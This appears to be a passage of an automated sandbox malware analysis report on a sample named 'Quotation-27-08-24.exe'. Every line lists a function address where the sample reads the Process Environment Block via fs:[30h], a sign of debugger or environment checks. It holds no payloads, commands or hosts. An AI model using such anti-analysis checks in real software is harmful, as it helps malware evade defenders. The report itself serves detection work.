            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5823B mov eax, dword ptr fs:[00000030h]4_2_00F5823B
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_010043D4 mov eax, dword ptr fs:[00000030h]4_2_010043D4
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_010043D4 mov eax, dword ptr fs:[00000030h]4_2_010043D4
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100E3DB mov eax, dword ptr fs:[00000030h]4_2_0100E3DB
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100E3DB mov eax, dword ptr fs:[00000030h]4_2_0100E3DB
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100E3DB mov ecx, dword ptr fs:[00000030h]4_2_0100E3DB
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100E3DB mov eax, dword ptr fs:[00000030h]4_2_0100E3DB
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F963FF mov eax, dword ptr fs:[00000030h]4_2_00F963FF
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F7E3F0 mov eax, dword ptr fs:[00000030h]4_2_00F7E3F0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F7E3F0 mov eax, dword ptr fs:[00000030h]4_2_00F7E3F0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F7E3F0 mov eax, dword ptr fs:[00000030h]4_2_00F7E3F0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F703E9 mov eax, dword ptr fs:[00000030h]4_2_00F703E9
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F703E9 mov eax, dword ptr fs:[00000030h]4_2_00F703E9
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F703E9 mov eax, dword ptr fs:[00000030h]4_2_00F703E9
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F703E9 mov eax, dword ptr fs:[00000030h]4_2_00F703E9
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F703E9 mov eax, dword ptr fs:[00000030h]4_2_00F703E9
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F703E9 mov eax, dword ptr fs:[00000030h]4_2_00F703E9
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F703E9 mov eax, dword ptr fs:[00000030h]4_2_00F703E9
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F703E9 mov eax, dword ptr fs:[00000030h]4_2_00F703E9
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F683C0 mov eax, dword ptr fs:[00000030h]4_2_00F683C0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F683C0 mov eax, dword ptr fs:[00000030h]4_2_00F683C0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F683C0 mov eax, dword ptr fs:[00000030h]4_2_00F683C0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F683C0 mov eax, dword ptr fs:[00000030h]4_2_00F683C0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6A3C0 mov eax, dword ptr fs:[00000030h]4_2_00F6A3C0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6A3C0 mov eax, dword ptr fs:[00000030h]4_2_00F6A3C0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6A3C0 mov eax, dword ptr fs:[00000030h]4_2_00F6A3C0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6A3C0 mov eax, dword ptr fs:[00000030h]4_2_00F6A3C0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6A3C0 mov eax, dword ptr fs:[00000030h]4_2_00F6A3C0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6A3C0 mov eax, dword ptr fs:[00000030h]4_2_00F6A3C0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE63C0 mov eax, dword ptr fs:[00000030h]4_2_00FE63C0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0101A250 mov eax, dword ptr fs:[00000030h]4_2_0101A250
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0101A250 mov eax, dword ptr fs:[00000030h]4_2_0101A250
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F58397 mov eax, dword ptr fs:[00000030h]4_2_00F58397
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F58397 mov eax, dword ptr fs:[00000030h]4_2_00F58397
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F58397 mov eax, dword ptr fs:[00000030h]4_2_00F58397
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01010274 mov eax, dword ptr fs:[00000030h]4_2_01010274
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01010274 mov eax, dword ptr fs:[00000030h]4_2_01010274
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01010274 mov eax, dword ptr fs:[00000030h]4_2_01010274
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01010274 mov eax, dword ptr fs:[00000030h]4_2_01010274
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01010274 mov eax, dword ptr fs:[00000030h]4_2_01010274
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01010274 mov eax, dword ptr fs:[00000030h]4_2_01010274
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01010274 mov eax, dword ptr fs:[00000030h]4_2_01010274
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01010274 mov eax, dword ptr fs:[00000030h]4_2_01010274
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01010274 mov eax, dword ptr fs:[00000030h]4_2_01010274
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01010274 mov eax, dword ptr fs:[00000030h]4_2_01010274
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01010274 mov eax, dword ptr fs:[00000030h]4_2_01010274
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01010274 mov eax, dword ptr fs:[00000030h]4_2_01010274
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8438F mov eax, dword ptr fs:[00000030h]4_2_00F8438F
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8438F mov eax, dword ptr fs:[00000030h]4_2_00F8438F
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5E388 mov eax, dword ptr fs:[00000030h]4_2_00F5E388
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5E388 mov eax, dword ptr fs:[00000030h]4_2_00F5E388
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5E388 mov eax, dword ptr fs:[00000030h]4_2_00F5E388
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE035C mov eax, dword ptr fs:[00000030h]4_2_00FE035C
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE035C mov eax, dword ptr fs:[00000030h]4_2_00FE035C
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE035C mov eax, dword ptr fs:[00000030h]4_2_00FE035C
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE035C mov ecx, dword ptr fs:[00000030h]4_2_00FE035C
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE035C mov eax, dword ptr fs:[00000030h]4_2_00FE035C
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE035C mov eax, dword ptr fs:[00000030h]4_2_00FE035C
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE2349 mov eax, dword ptr fs:[00000030h]4_2_00FE2349
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE2349 mov eax, dword ptr fs:[00000030h]4_2_00FE2349
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE2349 mov eax, dword ptr fs:[00000030h]4_2_00FE2349
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE2349 mov eax, dword ptr fs:[00000030h]4_2_00FE2349
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE2349 mov eax, dword ptr fs:[00000030h]4_2_00FE2349
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE2349 mov eax, dword ptr fs:[00000030h]4_2_00FE2349
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE2349 mov eax, dword ptr fs:[00000030h]4_2_00FE2349
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE2349 mov eax, dword ptr fs:[00000030h]4_2_00FE2349
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE2349 mov eax, dword ptr fs:[00000030h]4_2_00FE2349
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE2349 mov eax, dword ptr fs:[00000030h]4_2_00FE2349
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE2349 mov eax, dword ptr fs:[00000030h]4_2_00FE2349
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE2349 mov eax, dword ptr fs:[00000030h]4_2_00FE2349
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE2349 mov eax, dword ptr fs:[00000030h]4_2_00FE2349
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE2349 mov eax, dword ptr fs:[00000030h]4_2_00FE2349
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE2349 mov eax, dword ptr fs:[00000030h]4_2_00FE2349
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5C310 mov ecx, dword ptr fs:[00000030h]4_2_00F5C310
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F80310 mov ecx, dword ptr fs:[00000030h]4_2_00F80310
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9A30B mov eax, dword ptr fs:[00000030h]4_2_00F9A30B
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9A30B mov eax, dword ptr fs:[00000030h]4_2_00F9A30B
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9A30B mov eax, dword ptr fs:[00000030h]4_2_00F9A30B
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01034500 mov eax, dword ptr fs:[00000030h]4_2_01034500
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01034500 mov eax, dword ptr fs:[00000030h]4_2_01034500
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01034500 mov eax, dword ptr fs:[00000030h]4_2_01034500
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01034500 mov eax, dword ptr fs:[00000030h]4_2_01034500
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01034500 mov eax, dword ptr fs:[00000030h]4_2_01034500
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01034500 mov eax, dword ptr fs:[00000030h]4_2_01034500
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01034500 mov eax, dword ptr fs:[00000030h]4_2_01034500
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F604E5 mov ecx, dword ptr fs:[00000030h]4_2_00F604E5
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F944B0 mov ecx, dword ptr fs:[00000030h]4_2_00F944B0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FEA4B0 mov eax, dword ptr fs:[00000030h]4_2_00FEA4B0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F664AB mov eax, dword ptr fs:[00000030h]4_2_00F664AB
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8A470 mov eax, dword ptr fs:[00000030h]4_2_00F8A470
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8A470 mov eax, dword ptr fs:[00000030h]4_2_00F8A470
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8A470 mov eax, dword ptr fs:[00000030h]4_2_00F8A470
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FEC460 mov ecx, dword ptr fs:[00000030h]4_2_00FEC460
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8245A mov eax, dword ptr fs:[00000030h]4_2_00F8245A
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5645D mov eax, dword ptr fs:[00000030h]4_2_00F5645D
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9E443 mov eax, dword ptr fs:[00000030h]4_2_00F9E443
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9E443 mov eax, dword ptr fs:[00000030h]4_2_00F9E443
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9E443 mov eax, dword ptr fs:[00000030h]4_2_00F9E443
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9E443 mov eax, dword ptr fs:[00000030h]4_2_00F9E443
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9E443 mov eax, dword ptr fs:[00000030h]4_2_00F9E443
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9E443 mov eax, dword ptr fs:[00000030h]4_2_00F9E443
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9E443 mov eax, dword ptr fs:[00000030h]4_2_00F9E443
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9E443 mov eax, dword ptr fs:[00000030h]4_2_00F9E443
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9A430 mov eax, dword ptr fs:[00000030h]4_2_00F9A430
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5C427 mov eax, dword ptr fs:[00000030h]4_2_00F5C427
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5E420 mov eax, dword ptr fs:[00000030h]4_2_00F5E420
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5E420 mov eax, dword ptr fs:[00000030h]4_2_00F5E420
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5E420 mov eax, dword ptr fs:[00000030h]4_2_00F5E420
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE6420 mov eax, dword ptr fs:[00000030h]4_2_00FE6420
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE6420 mov eax, dword ptr fs:[00000030h]4_2_00FE6420
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE6420 mov eax, dword ptr fs:[00000030h]4_2_00FE6420
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE6420 mov eax, dword ptr fs:[00000030h]4_2_00FE6420
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE6420 mov eax, dword ptr fs:[00000030h]4_2_00FE6420
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE6420 mov eax, dword ptr fs:[00000030h]4_2_00FE6420
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE6420 mov eax, dword ptr fs:[00000030h]4_2_00FE6420
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F98402 mov eax, dword ptr fs:[00000030h]4_2_00F98402
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F98402 mov eax, dword ptr fs:[00000030h]4_2_00F98402
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F98402 mov eax, dword ptr fs:[00000030h]4_2_00F98402
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9C5ED mov eax, dword ptr fs:[00000030h]4_2_00F9C5ED
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9C5ED mov eax, dword ptr fs:[00000030h]4_2_00F9C5ED
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F625E0 mov eax, dword ptr fs:[00000030h]4_2_00F625E0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8E5E7 mov eax, dword ptr fs:[00000030h]4_2_00F8E5E7
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8E5E7 mov eax, dword ptr fs:[00000030h]4_2_00F8E5E7
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8E5E7 mov eax, dword ptr fs:[00000030h]4_2_00F8E5E7
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8E5E7 mov eax, dword ptr fs:[00000030h]4_2_00F8E5E7
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8E5E7 mov eax, dword ptr fs:[00000030h]4_2_00F8E5E7
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8E5E7 mov eax, dword ptr fs:[00000030h]4_2_00F8E5E7
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8E5E7 mov eax, dword ptr fs:[00000030h]4_2_00F8E5E7
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8E5E7 mov eax, dword ptr fs:[00000030h]4_2_00F8E5E7
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F665D0 mov eax, dword ptr fs:[00000030h]4_2_00F665D0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9A5D0 mov eax, dword ptr fs:[00000030h]4_2_00F9A5D0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9A5D0 mov eax, dword ptr fs:[00000030h]4_2_00F9A5D0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9E5CF mov eax, dword ptr fs:[00000030h]4_2_00F9E5CF
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9E5CF mov eax, dword ptr fs:[00000030h]4_2_00F9E5CF
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F845B1 mov eax, dword ptr fs:[00000030h]4_2_00F845B1
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F845B1 mov eax, dword ptr fs:[00000030h]4_2_00F845B1
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0101A456 mov eax, dword ptr fs:[00000030h]4_2_0101A456
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE05A7 mov eax, dword ptr fs:[00000030h]4_2_00FE05A7
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE05A7 mov eax, dword ptr fs:[00000030h]4_2_00FE05A7
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE05A7 mov eax, dword ptr fs:[00000030h]4_2_00FE05A7
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9E59C mov eax, dword ptr fs:[00000030h]4_2_00F9E59C
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F94588 mov eax, dword ptr fs:[00000030h]4_2_00F94588
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F62582 mov eax, dword ptr fs:[00000030h]4_2_00F62582
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F62582 mov ecx, dword ptr fs:[00000030h]4_2_00F62582
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9656A mov eax, dword ptr fs:[00000030h]4_2_00F9656A
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9656A mov eax, dword ptr fs:[00000030h]4_2_00F9656A
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9656A mov eax, dword ptr fs:[00000030h]4_2_00F9656A
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0101A49A mov eax, dword ptr fs:[00000030h]4_2_0101A49A
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F68550 mov eax, dword ptr fs:[00000030h]4_2_00F68550
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F68550 mov eax, dword ptr fs:[00000030h]4_2_00F68550
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F70535 mov eax, dword ptr fs:[00000030h]4_2_00F70535
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F70535 mov eax, dword ptr fs:[00000030h]4_2_00F70535
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F70535 mov eax, dword ptr fs:[00000030h]4_2_00F70535
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F70535 mov eax, dword ptr fs:[00000030h]4_2_00F70535
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F70535 mov eax, dword ptr fs:[00000030h]4_2_00F70535
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F70535 mov eax, dword ptr fs:[00000030h]4_2_00F70535
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8E53E mov eax, dword ptr fs:[00000030h]4_2_00F8E53E
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8E53E mov eax, dword ptr fs:[00000030h]4_2_00F8E53E
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8E53E mov eax, dword ptr fs:[00000030h]4_2_00F8E53E
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8E53E mov eax, dword ptr fs:[00000030h]4_2_00F8E53E
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8E53E mov eax, dword ptr fs:[00000030h]4_2_00F8E53E
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FF6500 mov eax, dword ptr fs:[00000030h]4_2_00FF6500
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FDE6F2 mov eax, dword ptr fs:[00000030h]4_2_00FDE6F2
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FDE6F2 mov eax, dword ptr fs:[00000030h]4_2_00FDE6F2
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FDE6F2 mov eax, dword ptr fs:[00000030h]4_2_00FDE6F2
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FDE6F2 mov eax, dword ptr fs:[00000030h]4_2_00FDE6F2
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE06F1 mov eax, dword ptr fs:[00000030h]4_2_00FE06F1
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE06F1 mov eax, dword ptr fs:[00000030h]4_2_00FE06F1
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9A6C7 mov ebx, dword ptr fs:[00000030h]4_2_00F9A6C7
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9A6C7 mov eax, dword ptr fs:[00000030h]4_2_00F9A6C7
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F966B0 mov eax, dword ptr fs:[00000030h]4_2_00F966B0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9C6A6 mov eax, dword ptr fs:[00000030h]4_2_00F9C6A6
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F64690 mov eax, dword ptr fs:[00000030h]4_2_00F64690
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F64690 mov eax, dword ptr fs:[00000030h]4_2_00F64690
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F92674 mov eax, dword ptr fs:[00000030h]4_2_00F92674
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100678E mov eax, dword ptr fs:[00000030h]4_2_0100678E
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9A660 mov eax, dword ptr fs:[00000030h]4_2_00F9A660
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9A660 mov eax, dword ptr fs:[00000030h]4_2_00F9A660
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_010147A0 mov eax, dword ptr fs:[00000030h]4_2_010147A0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F7C640 mov eax, dword ptr fs:[00000030h]4_2_00F7C640
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F7E627 mov eax, dword ptr fs:[00000030h]4_2_00F7E627
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F96620 mov eax, dword ptr fs:[00000030h]4_2_00F96620
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F98620 mov eax, dword ptr fs:[00000030h]4_2_00F98620
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6262C mov eax, dword ptr fs:[00000030h]4_2_00F6262C
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2619 mov eax, dword ptr fs:[00000030h]4_2_00FA2619
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FDE609 mov eax, dword ptr fs:[00000030h]4_2_00FDE609
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F7260B mov eax, dword ptr fs:[00000030h]4_2_00F7260B
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F7260B mov eax, dword ptr fs:[00000030h]4_2_00F7260B
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F7260B mov eax, dword ptr fs:[00000030h]4_2_00F7260B
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F7260B mov eax, dword ptr fs:[00000030h]4_2_00F7260B
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F7260B mov eax, dword ptr fs:[00000030h]4_2_00F7260B
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F7260B mov eax, dword ptr fs:[00000030h]4_2_00F7260B
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F7260B mov eax, dword ptr fs:[00000030h]4_2_00F7260B
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F647FB mov eax, dword ptr fs:[00000030h]4_2_00F647FB
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F647FB mov eax, dword ptr fs:[00000030h]4_2_00F647FB
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F827ED mov eax, dword ptr fs:[00000030h]4_2_00F827ED
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F827ED mov eax, dword ptr fs:[00000030h]4_2_00F827ED
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F827ED mov eax, dword ptr fs:[00000030h]4_2_00F827ED
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FEE7E1 mov eax, dword ptr fs:[00000030h]4_2_00FEE7E1
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6C7C0 mov eax, dword ptr fs:[00000030h]4_2_00F6C7C0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE07C3 mov eax, dword ptr fs:[00000030h]4_2_00FE07C3
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F607AF mov eax, dword ptr fs:[00000030h]4_2_00F607AF
